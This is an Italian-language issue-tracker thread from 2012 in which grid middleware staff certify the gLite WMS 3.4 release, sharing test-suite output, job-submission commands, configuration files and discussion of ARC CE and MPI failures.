Comment by Doina Cristina Duma [ 25/Sep/12 ]

Non manca nel repository di certificazione.
Hai provato guardare la lista di rpm presenti nel task del WMS 3.4 (non c'è questo rpm), o la lista di dipendenze del emi-wms (non c'è questo rpm)?
il kill-stale-ftp è un rpm richiesto da CREAM.

L'hai trovato installato su un altro WMS?
su un WMS EMI 1 di produzione a PD non c'è.

Se hai bisogno installarlo per fare dei test - è presente nel repository di produzione, puoi fare "yum install kill-stale-ftp"

Comment by Fabio Capannini [ 25/Sep/12 ]

Sembra che nel repository di certificazione manchi un rpm (kill-stale-ftp):

[root@cert-13 ~]# ls /etc/cron.d/kill-stale-ftp.cron
ls: /etc/cron.d/kill-stale-ftp.cron: No such file or directory

Comment by Fabio Capannini [ 24/Sep/12 ]

Sergio, assicurati che il test stia sottomettendo al wms giusto..

Comment by Sergio Traldi [X] (Inactive) [ 24/Sep/12 ]

Stress Test lanciato.
Ciao
Sergio

Comment by Fabio Capannini [ 24/Sep/12 ]

Lo stress-test si trova su cert-17 in /root/certification/StressTest/

Bisogna installare il seguente cron:
51 */6 * * * capannini voms-proxy-init --voms dteam; cp -p /tmp/x509up_u504 /home/capannini/certification/StressTest/proxy/user0.proxy

che richiede che voms-proxy-init crei il proxy senza richiesta di password.

Per il resto seguire la guida nel twiki.

Comment by Sara Bertocco [X] (Inactive) [ 24/Sep/12 ]

$ python WMS-job-cycle.py -c wms-command.conf -V dteam -d 3 -l -t 8 -i
===> +++++++++++++++++++++++++++++++++++++++++++++++++++++
===> + TestSuite of the WMS Service
===> + Description: Test a complete job cycle: from submission to get output
===> +++++++++++++++++++++++++++++++++++++++++++++++++++++

Enter the user proxy password:

Set 8: Testing forwarding parameters for parallel jobs

Test 8: Case 1

===> ERROR: Timeout reached while waiting the job https://cert-27.cnaf.infn.it:9000/68qw7Nt_RIbPsm_1TuRHpQ to transfered to CE
Traceback (most recent call last):
File "WMS-job-cycle.py", line 734, in ?
main()
File "WMS-job-cycle.py", line 717, in main
if forward_parameters_parallel_jobs(utils, tests[7]):
File "WMS-job-cycle.py", line 458, in forward_parameters_parallel_jobs
utils.wait_until_job_transfered(JOBID)
File "/home/bertocco/WMS-Test-Suite/WMS-service/Test_utils.py", line 1235, in wait_until_job_transfered
raise TimeOutError("","Timeout reached while waiting the job %s to transfered to CE"%(jobid))
Exceptions.TimeOutError: 'Timeout reached while waiting the job https://cert-27.cnaf.infn.it:9000/68qw7Nt_RIbPsm_1TuRHpQ to transfered to CE'

Comment by Doina Cristina Duma [ 20/Sep/12 ]

Quindi basta avere risultati che funziona con un ARC 11.05?
Per ARC 12.05 si aggiungere riferimento al bug savannah e si dice che non funziona per mottivi di ARC.

C

Comment by Doina Cristina Duma [ 20/Sep/12 ]

OK - capito! WMS non funziona ancora con ARC.

Il WMS EMI 1 (3.3.5) funzionava (almeno dal test report.
Per cui le verifiche e il debug di questo problema finisce qui!
Si aggiunge una nota nelle Known Issues che non va con una certa versione di ARC e basta!
Il resto lo fa il PT - quello che serve per risolvere i problemi. Saranno rilasciati con un altro update. O se no si ferma la certificazione e facciamo altro.
Andiamo avanti con i altri test, se ci sono altri.

Serve che chiedo io a Marco se fermare o no la certificazione?

No, Marco dice che basta che ci sia un ce arc funzionante.

Comment by Fabio Capannini [ 20/Sep/12 ]

Ulteriore problema trovato nell' arc ce del testbed (pgs03). Vedere task savannah referenziato in questo task jira piu' sopra.

Comment by Fabio Capannini [ 19/Sep/12 ]

Puo' darsi che abbiano considerato la retrocompatibilita' rispetto al client arc, ma non al nordugrid_gahp. Se per caso sei a Praga puoi provare a chiedere a qualcuno di arc. Il problema e' comunque noto, ho solo ipotizzato che sia il nostro caso, qualcuno dovrebbe confermarlo con delle prove.

Comment by Doina Cristina Duma [ 19/Sep/12 ]

mettilo un PASSED colore giallo, con un Known Issue - dove mostri che non funziona con un ARC CE 12.05
Da quello che sapevo io le novita' introdotto in EMI 2 da ARC dovevano creare pb solo per chi usave "non-production" version:
http://www.eu-emi.eu/emi-2-matterhorn-products/-/asset_publisher/B4Rk/content/arc-ce-1

Backward compatibility:

Compatibility of ARC WS endpoints with older ARC 11.05 clients that relied on incomplete GLUE2 to communicate to pre-production WS endpoints are broken due to the more compliant GLUE2 LDAP and XML rendering introduced in this release. Upgrade to new ARC 12.05 Clients is highly recommended.
No backward incompatibility is introduced w.r.t. the production gridftp interface.

Comment by Fabio Capannini [ 19/Sep/12 ]

Si, jade e' un ce attualmente funzionante, immagino anche quello sia antecedente ad ARC 12.05.
Visto che il test funziona solo con alcuni ce, come devo dichiarare il test arc nel twiki? Partially Passed ad esempio?

Comment by Sergio Traldi [X] (Inactive) [ 19/Sep/12 ]

Ciao,
ma ho sottomesso un job a un CE ARC proprio oggi per Sara sul WMS SL6 cert-27.cnaf.infn.it che immagino sia 3.4 con VO CMS e tutto e' andato lisco.
Cosa esattamente non funziona della sottomissione ad ARC il Match making forse perche' usando il -r funziona:
[traldi@cert-25 ~]$ glite-wms-job-submit -o test_Arc_CE.txt -e https://cert-27.cnaf.infn.it:7443/glite_wms_wmproxy_server -a -r jade-cms.hip.fi:2811/nordugrid-GE-arc testArc.jdl

(cosi per intenderci)
Ciao

Comment by Fabio Capannini [ 19/Sep/12 ]

Non mi sembra in realta' un problema del wms, ma piuttosto una modifica in arc che non e' retrocompatibile.
Per quanto riguarda la pre-certificazione, vedo che e' stato usato il ce krokar.ijs.si:2811/nordugrid-torque-arc che forse e' antecedente a ARC 12.05.

Comment by Doina Cristina Duma [ 19/Sep/12 ]

allora e' un probelma del WMS che ancora cnon funziona con ARC CE per cui si mette una Known Issues, again, e si va avanti
Non dobbiamo fare altre prove, dobbiamo testare quello che abbiamo ricevuto e notificare i problemi. Mostrando alla fine se il prodotto puo o no essere usato.
Vai avanti, anche se recompila e fa altro non entra in questa update. O si ferma tuta la certificazione, si rifano il codice, i tag i rpm, la precertificazione e quando la loro precertificazione va bene andiamo di nuovo noi.
BTW - come mai questo pb non l'hanno trovato durante la precertificazione? Non dovevano verificare anche il funzionamento di ARC?

Comment by Fabio Capannini [ 19/Sep/12 ]

La patch e' per un componente che sta sul wms ma richiede ricompilazione, quindi non e' immediato provarla

Comment by Doina Cristina Duma [ 19/Sep/12 ]

non capisco cosa proponi di fare.
Andare sul ARC CE del testbed e applicare quel patch?

Comment by Fabio Capannini [ 19/Sep/12 ]

Aggiornamento sul problema del CE ARC.
Indagando mi sembra probabile che si tratti della seguente issue:

https://condor-wiki.cs.wisc.edu/index.cgi/tktview?tn=3062

Richiederebbe di ricompilare il nordugrid_gahp applicando la patch proposta.

Comment by Sara Bertocco [X] (Inactive) [ 17/Sep/12 ]

Non riesco a fare il test che incollo sotto perche` non ho la password delle macchine del cnaf:
$ python WMS-jdl-attributes-job-cycle.py -c wms-command.conf -V dteam -d 3 -l -i -t 6
===> +++++++++++++++++++++++++++++++++++++++++++++++++++++
===> + TestSuite of the WMS Service
===> + Description: Test a complete job cycle for normal job with non default jdl files
===> +++++++++++++++++++++++++++++++++++++++++++++++++++++

Enter the user proxy password:

Test 6: Jdl with OutputSandboxBaseDestURI

OSB_DEST_HOSTNAME = emi-demo11.cnaf.infn.it
OSB_DEST_USERNAME = root
OSB_DEST_PASSWORD = ***
===>
===> Test: WMS-jdl-attributes-job-cycle.py
===> WMS: cert-27.cnaf.infn.it
===> Started: 14:37:34
===> Ended : 14:40:44
===>
===> >>> TEST FAILED <<<
===>
===> >>> failure reason: 1 test(s) fail(s): ['Test 6: Jdl with OutputSandboxBaseDestURI'] <<<
===>
===> Test log file is WMSService-TS_20120917143734.log
===> Error messages have been written in /home/bertocco/WMS-Test-Suite/WMS-service/WMSService-Test_20120917143734/errors.log
===>
===> Test directory /home/bertocco/WMS-Test-Suite/WMS-service/WMSService-Test_20120917143734 has not been cleaned for debug purpose

Comment by Sara Bertocco [X] (Inactive) [ 14/Sep/12 ]

Ecco un nuovo tentativo:
$ python WMS-jdl-attributes-job-cycle.py -c wms-command.conf -V dteam -d 3 -l -i -t 1,2,4,5,6,7
===> +++++++++++++++++++++++++++++++++++++++++++++++++++++
===> + TestSuite of the WMS Service
===> + Description: Test a complete job cycle for normal job with non default jdl files
===> +++++++++++++++++++++++++++++++++++++++++++++++++++++

Enter the user proxy password:

Test 1: Jdl with AllowZippedISB

===> ERROR: Timeout reached while waiting the job https://cert-27.cnaf.infn.it:9000/b8g7sEmyxZCbvN5XJJOq3Q to finish

Test 2: Jdl with ExpiryTime

Sara, prova a lanciare con Testing i test tranne quelli che richiedono accesso ai dati remoti come data-req.

Comment by Doina Cristina Duma [ 14/Sep/12 ]

Limiter mechanism - MOSTLY PASSED (SAME FAILURES AS IN EMI1)

  • non mi sembra ci sono note per questi "same failures" nelle certificazioni precedenti del WMS (ho trovato qualcosa andando vedere un log di Alessio per la 3.3.4). Nei ultimi task di certificazione per WMS non c'e' niente (non parlo delle twiki dove e' "normale" che non compaia niente visto che "doveva" essere tutto "PASSED")
    Comunque - e' bene che cominciamo condividere i "veri" problemi del WMS.

Perche' non e' mai stato chiaro se sono veramente fallimenti del wms o se e' la testsuite che implementa dei test non (ancora) supportati dal wms.

Per le release notes - va benissimo.
Quindi per SL5 per adesso non c'e' stato niente blocante.
Vediamo la sett prossima i regression e come va con SL6.

Grazie

Comment by Fabio Capannini [ 14/Sep/12 ]

Il test del feedback ha funzionato parzialmente (vedere twiki).

E' stato creato un tkt ggus per un bug che abbiamo trovato durante la sottomissione arc, linkato nel twiki.

Per gli altri test falliti marco conta di inserire dei known issue nelle release notes.

Comment by Sara Bertocco [X] (Inactive) [ 14/Sep/12 ]

No, nessun progresso: prima avevo un errore nella configurazione del BDII (uno spazio nel nome) e non matchavo niente, poi ho aspettato a lungo il risultato del test di arc, ma senza successo perche` avevo un proxy dteam e ne serviva uno cms (il wms non segnala che la vo non e` supportata, il job e` rimasto in ready e la mattina dopo
$ glite-wms-job-status https://devel17.cnaf.infn.it:9000/5YWg0JvrwBM8QOmwRmmkjA https://cert-27.cnaf.infn.it:9000/Kk7EjCJUMsyoRiU5wxT9pg

======================= glite-wms-job-status Success =====================
BOOKKEEPING INFORMATION:

Status info for the Job : https://devel17.cnaf.infn.it:9000/5YWg0JvrwBM8QOmwRmmkjA
Current Status: Aborted
Logged Reason(s):

  • Job got an error while in the CondorG queue.
  • Job got an error while in the CondorG queue.
  • Job got an error while in the CondorG queue.
  • Job got an error while in the CondorG queue.
  • Job got an error while in the CondorG queue.
  • Job got an error while in the CondorG queue.
    Status Reason: proxy expired
    Destination: arc.univ.kiev.ua:2811/nordugrid-torque-arc
    Submitted: Thu Sep 13 11:05:30 2012 CEST
    ==========================================================================

======================= glite-wms-job-status Success =====================
BOOKKEEPING INFORMATION:

Status info for the Job : https://cert-27.cnaf.infn.it:9000/Kk7EjCJUMsyoRiU5wxT9pg
Current Status: Aborted
Logged Reason(s):

  • Job got an error while in the CondorG queue.
  • Job got an error while in the CondorG queue.
  • Job got an error while in the CondorG queue.
  • Job got an error while in the CondorG queue.
  • Job got an error while in the CondorG queue.
    Status Reason: proxy expired
    Destination: arc.univ.kiev.ua:2811/nordugrid-torque-arc
    Submitted: Thu Sep 13 13:46:09 2012 CEST
    ==========================================================================

La sottomissione era fatta con:
glite-wms-job-submit -o test_Sara.txt -e https://cert-27.cnaf.infn.it:7443/glite_wms_wmproxy_server -a -r arc.univ.kiev.ua:2811/nordugrid-torque-arc firsttest.jdl

--------------------------------------------------------------
Oggi nuovo test per ora e` fallito perche` servono dei ce che non si matchano con "Testing" e quindi devo cambiare la configurazione della testsuite e ripartire.

Comment by Doina Cristina Duma [ 14/Sep/12 ]

Per SL5 - ho visto che in questo momento ci sono 2 failed, un random, e uno che non e' migliorato da EMI 1 a EMI 2.
Fabio - per tutti hai parlato con Marco? Ci sono speigazioni o nuovi bug savannah che seguono questi problemi?

per SL6 - Sara - sulla twiki non ci sono novita'. Sei riuscita fare progressi?

Comment by Doina Cristina Duma [ 13/Sep/12 ]

Avrei bisogno che nelle 2 twiki vengono messi "PASSED" e "FAILED" per ogni test fattto (come facciamo per i regression tests) - per riusicre vedere velocemente cosa non va.
per SL6 ho messo io. Per SL5 ho messo solo come esempio per 3 dei test.

Fatto.

Comment by Doina Cristina Duma [ 12/Sep/12 ]

1. job mpi - mi sembra di capire che con il WMS 3.1 e CE externi il problema no si presenta, ma con questa versione (3.4) si?
Non sono sicuro che con glite 3.1 il problema non si presenti. Di certo lo sto verificando ora con glite 3.2.

2. hai contatato i developers? se il problema è confermata => bug savannah. IN questo casa sarebbe da discuttere quanto bloccante è.
Si, Marco mi ha detto di continuare la certificazione.

Comment by Fabio Capannini [ 12/Sep/12 ]

Il test del perusal fallisce. Probabile bug nel codice wms (non viene creato il file JDLStarted nella sandbox).

===> ERROR: Command glite-wms-job-perusal --get -f out.txt --dir /home/capannini/WMS-Test-Suite/WMS-service/WMSService-Test_20120911165612/jobOutput https://cert-13.cnaf.infn.it:9000/-4AKS693kkIhSsXsCK9xbw failed. Failure message:
Connecting to the service https://cert-13.cnaf.infn.it:7443/glite_wms_wmproxy_server

Error - WMProxy Server Error
The Operation is not allowed: the job is not started
Error code: SOAP-ENV:Server

Traceback (most recent call last):
File "WMS-job-cycle.py", line 734, in ?
main()
File "WMS-job-cycle.py", line 709, in main
if perusal_submit(utils, tests[5]):
File "WMS-job-cycle.py", line 392, in perusal_submit
result=perusal_submit_test(utils,"2119/jobmanager")
File "WMS-job-cycle.py", line 329, in perusal_submit_test
utils.run_command_continue_on_error ("glite-wms-job-perusal --get -f out.txt --dir %s %s"%(utils.get_job_output_dir(),JOBID))
File "/home/capannini/WMS-Test-Suite/WMS-service/Test_utils.py", line 1183, in run_command_continue_on_error
raise RunCommandError(args,OUTPUT[1])
Exceptions.RunCommandError: '\nConnecting to the service https://cert-13.cnaf.infn.it:7443/glite_wms_wmproxy_server\n\n\nError - WMProxy Server Error\nThe Operation is not allowed: the job is not started\nError code: SOAP-ENV:Server\n\n'

Comment by Fabio Capannini [ 11/Sep/12 ]

Problema con i job mpi. Non si possono usare i ce Testing perche' manca OPENMPI ma usando i ce del bdii tutti i job vanno in abort ed e' molto difficile completare il test.
Quanto sarebbe complicato avere in Testing un cream OPENMPI?

Comment by Fabio Capannini [ 11/Sep/12 ]

Si come ho scritto ieri il problema del dns e' superato. Io sto andando avanti, Sara puo' fare lo stesso.

Comment by Doina Cristina Duma [ 11/Sep/12 ]

novita'?

Ci sono ancora problemi o si puo andare avanti.
Fabio - hai fatto altri passi?
Sara andrebbe avanti con la testsuite.

Comment by Fabio Capannini [ 10/Sep/12 ]

Purtroppo c'e' un problema nel dns e cert-bdii-04.cnaf.infn.it non e' raggiungibile. Non si puo' fare molto finche' non viene ripristinato.

Il problema e' rientrato.

Comment by Doina Cristina Duma [ 07/Sep/12 ]

Fabio: anomalia WMS 3.4 - "provando revuperare l'output di un job con una vo diversa da quella del job il job viene messo a cleared e non e' piu possibile recuperare l'output in seguito"
A.Cristofori continua con Marco.
Fabio - ripoertera l'eventuale link al bug savannah se il pb verra' confermata

Comment by Danilo Nicola Dongiovanni [ 07/Sep/12 ]

ARC CE:
Florido ha commentato qui che ci sono delle inesattezze non ben precisate:
https://savannah.cern.ch/task/index.php?27452
vi aggiorno se e quando troviamo una soluzione per ARC CE del testbed

Comment by Danilo Nicola Dongiovanni [ 06/Sep/12 ]

CERTIFICAZIONE INTEGRAZIONE WMS -ARGUS
Per ora ho messo a False il flag di ARGUS.
Va capito come configurare argus e pepd.ini (mandata mail a Valery).
Vi aggiorno appena risponde

Comment by Doina Cristina Duma [ 06/Sep/12 ]

questa parte con "esulano dalla certificazione" la discutiamo domani.

Comment by Sara Bertocco [X] (Inactive) [ 06/Sep/12 ]

e io ti ringrazio perche` almeno cosi` so di replicare esattamente quello che hai fatto tu. E` la prima volta che certifico wms e sto cercando di orientarmi e di capire cosa fare.

Comment by Fabio Capannini [ 06/Sep/12 ]

Il twiki contiene tutto, ma i file di conf e i jdl da usare per una semplice sottomissione esulano dalla certificazione, ognuno usa quelli che meglio crede. Mi sono solo permesso di consigliare a Sara i miei visto che mi sembrava in difficolta'.

Comment by Danilo Nicola Dongiovanni [ 06/Sep/12 ]

direi che seguendo la certificazione 3.3.5 di Fabio ci sono abbastanza dettagli.
Ad ogni modo Sara, hai visto che i test submission sono gia' fatti e descritti nelle twiki riportate su?

Comment by Doina Cristina Duma [ 06/Sep/12 ]

posso solo dire che vedo molta confusione

questi detagli li abbiamo (bdii solito di certificazione, configration file wms_ui.conf, o come si chiama) SCRITTI da qualche parte?

Comment by Danilo Nicola Dongiovanni [ 06/Sep/12 ]

il bdii usato e' quello solito di certificazione che usa Fabio
II_Contact = "cert-bdii-04.cnaf.infn.it ";
non ho idea di che roba ci sia li dentro.
probabilmente un mix di production / emi large scale e testbed certificazione locale.

Comment by Fabio Capannini [ 06/Sep/12 ]

Ho provato la listmatch e vengono fuori solo i ce di pd come dovrebbe essere.
Prova ad usare questo file di conf:

WmsClient = [
ErrorStorage="/var/tmp";
OutputStorage= "/tmp";
ListenerStorage="/tmp";
virtualorganisation="dteam";
requirements = other.GlueCEStateStatus == "Production";
RetryCount = 0;
WMProxyEndPoints =

{"https://cert-27.cnaf.infn.it:7443/glite_wms_wmproxy_server"}

;
rank = -other.GlueCEStateEstimatedResponseTime;
];

e questo jdl:

[
Executable = "ls.sh";
Arguments = "-al";
requirements = other.GlueCEStateStatus == "Testing";
retrycount = 4;
shallowretrycount = 3;
StdError = "stderr.log";
StdOutput = "stdout.log";
InputSandbox = "ls.sh";
]

con ls.sh:
#!/bin/sh
/bin/ls $1

Comment by Sara Bertocco [X] (Inactive) [ 06/Sep/12 ]

Usando la vo testers invece che dteam matcho solo:
$ glite-wms-job-list-match -a -c /home/bertocco/conf/wms_test.conf /home/bertocco/jdl/test.jdl

Connecting to the service https://cert-27.cnaf.infn.it:7443/glite_wms_wmproxy_server

==========================================================================

COMPUTING ELEMENT IDs LIST
The following CE(s) matching your job requirements have been found:

CEId

  • ctb04.gridctb.uoa.gr:8443/cream-pbs-emitesters

==========================================================================

Comment by Danilo Nicola Dongiovanni [ 06/Sep/12 ]

La cert-13 e la cert-27 mi pare le avessi lasciate in both mode. Ad ogni modo sottometti un job e vedi subito, visto che LB e' nel JOBID.
Per quanto riguarda i CE da matchare dipendono dal BDII specificato.
Avevo gia' fatto i test di job submission e andavano tutti done, quindi piu' probabilmente c'e' un problema di proxy o data/ora o qualcosa di molto generale...

Comment by Sara Bertocco [X] (Inactive) [ 06/Sep/12 ]

Ho provato il primo test e i job mi vanno tutti (sia su lcg-ce che su cream) in aborted. Ci sono dei test preliminari da fare per vedere se si matchano i ce giusti e se funzionano?
Io ho provato:
glite-wms-job-list-match -a -c /home/bertocco/conf/wms_test.conf /home/bertocco/jdl/test.jdl
con
$ cat /home/bertocco/conf/wms_test.conf
[
WmsClient = [
ErrorStorage="/var/tmp";
OutputStorage= "/tmp";
ListenerStorage="/tmp";
requirements = other.GlueCEStateStatus == "Testing";
rank =-other.GlueCEStateEstimatedResponseTime ;
DefaultStatusLevel = 1 ;
DefaultLoggingLevel = 0 ;
WMProxyEndPoints =

{"https://cert-27.cnaf.infn.it:7443/glite_wms_wmproxy_server"}

;
VirtualOrganisation = "dteam";
MyProxyServer = "myproxy.cnaf.infn.it";
];
]

e mi vengono matchati molti piu` wms di quelli che dovrebbero:
Connecting to the service https://cert-27.cnaf.infn.it:7443/glite_wms_wmproxy_server

==========================================================================

COMPUTING ELEMENT IDs LIST
The following CE(s) matching your job requirements have been found:

CEId

  • atlasce2.lnf.infn.it:8443/cream-pbs-cert
  • cccreamceli05.in2p3.fr:8443/cream-sge-long
  • cccreamceli05.in2p3.fr:8443/cream-sge-medium
  • cccreamceli05.in2p3.fr:8443/cream-sge-short
  • cccreamceli06.in2p3.fr:8443/cream-sge-long
  • cccreamceli06.in2p3.fr:8443/cream-sge-medium
  • cccreamceli06.in2p3.fr:8443/cream-sge-short
  • cccreamceli09.in2p3.fr:8443/cream-sge-long
  • cccreamceli09.in2p3.fr:8443/cream-sge-medium
  • cccreamceli09.in2p3.fr:8443/cream-sge-short
  • ce-02.roma3.infn.it:8443/cream-pbs-cert
  • ce-cream.mi.infn.it:8443/cream-pbs-cert
  • ce.cyb-pcr.it:2119/jobmanager-lcgsge-poncert
  • ce.scope.unina.it:8443/cream-pbs-egeecert
  • ce01.oats.inaf.it:8443/cream-pbs-dteam
  • ce203.cern.ch:8443/cream-lsf-grid_2nh_dteam
  • ce203.cern.ch:8443/cream-lsf-grid_dteam
  • ce204.cern.ch:8443/cream-lsf-grid_2nh_dteam
  • ce204.cern.ch:8443/cream-lsf-grid_dteam
  • ce205.cern.ch:8443/cream-lsf-grid_2nh_dteam
  • ce205.cern.ch:8443/cream-lsf-grid_dteam
  • ce206.cern.ch:8443/cream-lsf-grid_2nh_dteam
  • ce206.cern.ch:8443/cream-lsf-grid_dteam
  • ce207.cern.ch:8443/cream-lsf-grid_2nh_dteam
  • ce207.cern.ch:8443/cream-lsf-grid_dteam
  • ce208.cern.ch:8443/cream-lsf-grid_2nh_dteam
  • ce208.cern.ch:8443/cream-lsf-grid_dteam
  • cebo-t3-01.cr.cnaf.infn.it:8443/cream-lsf-T3_BO
  • cebo-t3-02.cr.cnaf.infn.it:8443/cream-lsf-T3_BO
  • cecream.ca.infn.it:8443/cream-lsf-cert
  • cert-ce-01.cnaf.infn.it:8443/cream-pbs-cert
  • cex.grid.unipg.it:8443/cream-pbs-cert
  • cmsrm-cream01.roma1.infn.it:8443/cream-lsf-cmsgcert
  • cmsrm-cream02.roma1.infn.it:8443/cream-lsf-cmsgcert
  • cream-19.pd.infn.it:8443/cream-lsf-cert
  • cream-19.pd.infn.it:8443/cream-lsf-creamcert1
  • cream-19.pd.infn.it:8443/cream-lsf-creamcert2
  • cream-20.pd.infn.it:8443/cream-lsf-cert
  • cream-20.pd.infn.it:8443/cream-lsf-creamcert1
  • cream-20.pd.infn.it:8443/cream-lsf-creamcert2
  • cream-22.pd.infn.it:8443/cream-lsf-cert
  • cream-22.pd.infn.it:8443/cream-lsf-creamcert1
  • cream-22.pd.infn.it:8443/cream-lsf-creamcert2
  • cream-23.pd.infn.it:8443/cream-lsf-cert
  • cream-23.pd.infn.it:8443/cream-lsf-creamcert1
  • cream-23.pd.infn.it:8443/cream-lsf-creamcert2
  • cream-29.pd.infn.it:8443/cream-lsf-cert
  • cream-29.pd.infn.it:8443/cream-lsf-creamcert1
  • cream-29.pd.infn.it:8443/cream-lsf-creamcert2
  • cream-39.pd.infn.it:8443/cream-pbs-cert
  • cream-39.pd.infn.it:8443/cream-pbs-creamtest1
  • cream-39.pd.infn.it:8443/cream-pbs-creamtest2
  • cream-ce-2.ba.infn.it:8443/cream-pbs-cert
  • cream-ce.research-infrastructures.eu:8443/cream-pbs-dteam
  • dgas-test-vm03.cnaf.infn.it:8443/cream-pbs-cert
  • duck-01.biocomp.unibo.it:8443/cream-pbs-cert
  • egice.polito.it:8443/cream-pbs-cert
  • egridglitece.crs4.it:8443/cream-lsf-cert
  • emi-ce01.scope.unina.it:8443/cream-pbs-egeecert
  • gilda-01.pd.infn.it:2119/jobmanager-lcgpbs-cert
  • grid.uibk.ac.at:8443/cream-pbs-dteam
  • grid010.ct.infn.it:8443/cream-pbs-cert
  • grid012.ct.infn.it:8443/cream-lsf-cert
  • gridce.ilc.cnr.it:8443/cream-pbs-cert
  • gridce3.pi.infn.it:8443/cream-lsf-certmpi
  • gridsrv2-4.dir.garr.it:8443/cream-pbs-cert
  • grisuce.scope.unina.it:8443/cream-pbs-egeecert
  • hephygr.oeaw.ac.at:8443/cream-pbs-dteam
  • hepx4.uibk.ac.at:8443/cream-pbs-dteam
  • ng-ce.grid.unipg.it:8443/cream-pbs-cert
  • pbs-enmr.cerm.unifi.it:8443/cream-pbs-cert
  • prod-ce-01.pd.infn.it:8443/cream-lsf-cert
  • sirius-ce.ct.infn.it:8443/cream-pbs-cert
  • t2-ce-01.mi.infn.it:2119/jobmanager-lcgpbs-cert
  • t2-ce-01.to.infn.it:8443/cream-pbs-cert
  • t2-ce-01.to.infn.it:8443/cream-pbs-short
  • t2-ce-02.mi.infn.it:2119/jobmanager-lcgcondor-cert
  • unict-dmi-ce-01.ct.pi2s2.it:2119/jobmanager-lcglsf-cert
  • unime-ce-01.me.pi2s2.it:2119/jobmanager-lcglsf-cert
  • virgo-ce.roma1.infn.it:2119/jobmanager-lcgpbs-cert
  • grid-ce.pv.infn.it:8443/cream-pbs-cert
  • ce-01.roma3.infn.it:8443/cream-pbs-cert
  • cccreamceli10.in2p3.fr:8443/cream-sge-long
  • cccreamceli10.in2p3.fr:8443/cream-sge-medium
  • cccreamceli10.in2p3.fr:8443/cream-sge-short
  • ce01-lcg.cr.cnaf.infn.it:8443/cream-lsf-dteam
  • ce07-lcg.cr.cnaf.infn.it:8443/cream-lsf-dteam
  • ce04-lcg.cr.cnaf.infn.it:8443/cream-lsf-dteam
  • ce09-lcg.cr.cnaf.infn.it:8443/cream-lsf-dteam
  • ce08-lcg.cr.cnaf.infn.it:8443/cream-lsf-dteam
  • ce05-lcg.cr.cnaf.infn.it:8443/cream-lsf-dteam
  • linucs-ce-01.cs.infn.it:8443/cream-pbs-atlasgcert
  • ce06-lcg.cr.cnaf.infn.it:8443/cream-lsf-dteam
  • gridce4.pi.infn.it:8443/cream-lsf-certmpi
  • cream-26.pd.infn.it:2119/jobmanager-lcgpbs-cert
  • cream-26.pd.infn.it:2119/jobmanager-lcgpbs-creamtest1
  • cream-26.pd.infn.it:2119/jobmanager-lcgpbs-creamtest2
  • cream-30.pd.infn.it:8443/cream-pbs-cert
  • cream-30.pd.infn.it:8443/cream-pbs-creamtest1
  • cream-30.pd.infn.it:8443/cream-pbs-creamtest2
  • ce-1.le.infn.it:8443/cream-lsf-cert
  • ce.cesic.unical.it:8443/cream-pbs-test
  • cmsrm-ce01.roma1.infn.it:2119/jobmanager-lcglsf-cmsgcert
  • cmsrm-ce02.roma1.infn.it:2119/jobmanager-lcglsf-cmsgcert
  • cream-24.pd.infn.it:8443/cream-lsf-cert
  • cream-24.pd.infn.it:8443/cream-lsf-testbedB_1
  • cream-24.pd.infn.it:8443/cream-lsf-testbedB_2
  • cream-40.pd.infn.it:8443/cream-pbs-cert
  • cream-40.pd.infn.it:8443/cream-pbs-creamtest1
  • cream-40.pd.infn.it:8443/cream-pbs-creamtest2
  • cream-41.pd.infn.it:8443/cream-pbs-cert
  • cream-41.pd.infn.it:8443/cream-pbs-creamtest1
  • cream-41.pd.infn.it:8443/cream-pbs-creamtest2
  • cream-ce-01.ct.trigrid.it:8443/cream-lsf-cert
  • cream-ce.ct.infn.it:8443/cream-lsf-cert
  • gridce0.pi.infn.it:8443/cream-lsf-cert
  • gridce1.pi.infn.it:2119/jobmanager-lcglsf-cert
  • gridce2.pi.infn.it:2119/jobmanager-lcglsf-cert
  • infn-ce-01.ct.pi2s2.it:8443/cream-lsf-cert
  • infnlns-ce-01.ct.pi2s2.it:8443/cream-lsf-cert
  • arcserv.ira.inaf.it:8443/cream-pbs-cert
  • atlasce3.lnf.infn.it:8443/cream-pbs-cert
  • atlasce4.lnf.infn.it:8443/cream-pbs-cert
  • boce.bo.infn.it:8443/cream-pbs-cert
  • cert-37.pd.infn.it:8443/cream-lsf-cert
  • cream-01.cnaf.infn.it:8443/cream-pbs-cert
  • cream-02.cnaf.infn.it:8443/cream-pbs-cert
  • cream-02.cnaf.infn.it:8443/cream-pbs-test-sl6
  • cream-18.pd.infn.it:8443/cream-lsf-cert
  • cream-18.pd.infn.it:8443/cream-lsf-creamtest1
  • cream-18.pd.infn.it:8443/cream-lsf-creamtest2
  • cream-35.pd.infn.it:8443/cream-lsf-cert
  • cream-35.pd.infn.it:8443/cream-lsf-creamtest1
  • cream-35.pd.infn.it:8443/cream-lsf-creamtest2
  • cream-ce-1.ba.infn.it:8443/cream-pbs-cert
  • cream-ce.pg.infn.it:8443/cream-pbs-cert
  • cremino.cnaf.infn.it:8443/cream-pbs-cert
  • cremino.cnaf.infn.it:8443/cream-pbs-cloudtf
  • cremoso.cnaf.infn.it:8443/cream-pbs-cloudcert
  • cremoso.cnaf.infn.it:8443/cream-pbs-cloudtest
  • cremoso.cnaf.infn.it:8443/cream-pbs-cloudtf
  • ctb04.gridctb.uoa.gr:8443/cream-pbs-dteam
  • grid0.fe.infn.it:8443/cream-pbs-cert
  • inaf-ce-01.ct.pi2s2.it:8443/cream-lsf-cert
  • pamelace01.na.infn.it:8443/cream-pbs-cert
  • prod-ce-02.pd.infn.it:2119/jobmanager-lcglsf-cert
  • unipa-ce-01.pa.pi2s2.it:2119/jobmanager-lcglsf-cert

==========================================================================

Comment by Sara Bertocco [X] (Inactive) [ 05/Sep/12 ]

Dovrei provare a cominciare qualche test su SL6 (cert-27). Come e` configurata adesso? BOTH o PROXY? Se PROXY chi e` il suo lb? devel-17?

Comment by Doina Cristina Duma [ 05/Sep/12 ]

avevamo detto diversamente:

  • se i dag sono supportati SOLO da lcg-CE, il lcg-CE non esiste più per cui i test dag non servono più inquanto non esiste un CE che gli supporta.
  • se invece i test dag sono supportati dai ARC CE e Condor CE veranno verificati verso Condor CE e ARC CE.

però per questa certificazione, visto che abbiamo ancora un lcg-CE nel testbed, facciamo i dag test verso questo CE. Ma dovrebe essere l'ultima volta! Non solo lcg-CE non è più supportato, lcg-CE è SL4, SL4 è ..."morto",neanche security support non si fa e per questo è priobitissimo!

Comment by Fabio Capannini [ 04/Sep/12 ]

Dal momento che i dag sono supportati solo da lcg ce decidiamo di lasciare nella testsuite il test dag verso lcg ce. Gli altri test vengono eseguiti solo verso cream.

